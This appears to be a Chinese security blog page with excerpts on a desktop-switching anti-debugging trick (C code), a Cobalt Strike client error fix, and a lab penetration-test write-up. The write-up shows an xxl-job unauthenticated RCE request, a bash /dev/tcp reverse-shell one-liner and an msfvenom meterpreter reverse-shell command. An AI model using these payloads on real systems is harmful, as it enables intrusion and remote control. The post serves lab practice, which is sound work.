Posts

昨天我在学习反调试，参考https://anti-debug.checkpoint.com/techniques/interactive.html这个大佬写的，这是一个窗口切换代码 BOOL Switch() { HDESK hNewDesktop = CreateDesktopA( "test", NULL, NULL, 0, DESKTOP_CREATEWINDOW | DESKTOP_WRITEOBJECTS | DESKTOP_SWITCHDESKTOP, NULL); if (!hNewDesktop) return FALSE; return SwitchDesktop(hNewDesktop); } 编译之后以运行，整个物理机就gg了，全白屏，为了演示效果大概像这样，不知道为什么虚拟机是黑的，不过效果都一样： 据我所知，一旦进入这种窗口切换模式，外面的蓝队想返回桌面变得近乎不可能，虽然后台的程序一切正常，不过除非危机关头，差一点到核心内网，要擦除工具后门遗留的数据等等，不要使用。 排查思考 目前来说只有重启系统才能恢复到正常，不过有些APT勒索组织要是把这玩意加入进启动项，那就是噩梦的开始了，物理机一般用F8可以进入安全启动模式，安全启动模式只会加载系统核心的组件，方便我们排查这类恶意的程序，但是虚拟机似乎没有很好的办法进入安全启动模式，按照官方文档F8依然没办法进去，一般我们要登陆进去才能去启动安全模式，但是登陆进去瞬间黑屏的话非常难受 其他可能都方法 一般企业可能有下方执行命令的系统，可以直接下发命令去删除这类启动项计划任务，或者这台虚拟机不止一个账户，用其他账户登陆也可能不受影响，也直接利用135、445端口的那种横向技巧也能登陆进来，不过现在就3389开着多似乎也不是一个好主意。。。。 完

背景 某天上午虚拟机突然卡死崩溃，再次启动我的cobaltstrike，运行发现报java空指针错误，搞了一上午也没找到原因，下午睡觉起来找到了是颜色设置的问题 错误和解决 报错内容大概是这样的： java.lang.NumberFormatException during cortana bridge: &openEventLog [Aggressor Script Event Queue]: Zero length string java.lang.NumberFormatException: Zero length string at java.base/java.lang.Integer.decode (Integer.java:1401) at java.desktop/java.awt.Color.decode(Color.java:729) at aggressor.Prefs. getColor(Unknown Source) at console.StatusBar.<init>(Unknown Source) at console.Console .<init>(Unknown Source) at console.ActivityConsole.<init>(Unknown Source) at aggressor.windows.EventLog.<init>(Unknown Source) at aggressor.bridges.AggressorBridge.evaluate(Unknown Source) at cortana.SafeFunction.evaluate(Unknown Source) at sleep.engine.CallRequest$FunctionCallRequest.execute(Unknown Source) at sleep.engine.CallRequest.CallFunction(Unknown Source) at sleep.engine.atoms.Call.evaluate(Unknown Source) at sleep.engine.Block.evaluate(Unknown Source) at sleep.engine.Block.evaluate (Unknown Source) at sleep.bridges.SleepClosure.evaluate(Unknown Source) at sleep.engine.CallRequest$ClosureCallRequest.execute(Unknown Source) at sleep....

本篇是老东家的某个月同事出的靶场渗透测试，都是常规操作，拿来练手提升基础熟练度非常合适 目录扫描发现： 访问发现报错信息： 根据java的包的报错，可以找到源代码，这里我问了chatgpt： 谷歌找到文档，翻到后台： http://192.168.10.70:8080/xxl-job-admin/toLogin 经过翻阅，发现有一个未授权的RCE，最新的那个SSRF进后台RCR的那个没搞出来，这个是老的： POST /run HTTP/1.1 Host: 192.168.10.70:9999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 521 { "jobId":1, "executorHandler":"demoJobHandler", "executorParams":"demoJobHandler", "executorBlockStrategy":"COVER_EARLY", "executorTimeout":0, "logId":1, "logDateTime":1586629003729, "glueType":"GLUE_SHELL", "glueSource":"ping ecujz4ok5rcfvx3kdd5turf0rrxil89x.oastify.com", "glueUpdatetime":1586629003727, "broadcastIndex":0, "broadcastTotal":0 } dns成功触发了： 接下来就是反弹shell, /bin/bash -i >& /dev/tcp/192.168.11.108/8888 0>&1 msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.11.108 LPORT=443 -f elf -o reverse.elf 为了维持住会话，上一下msf:...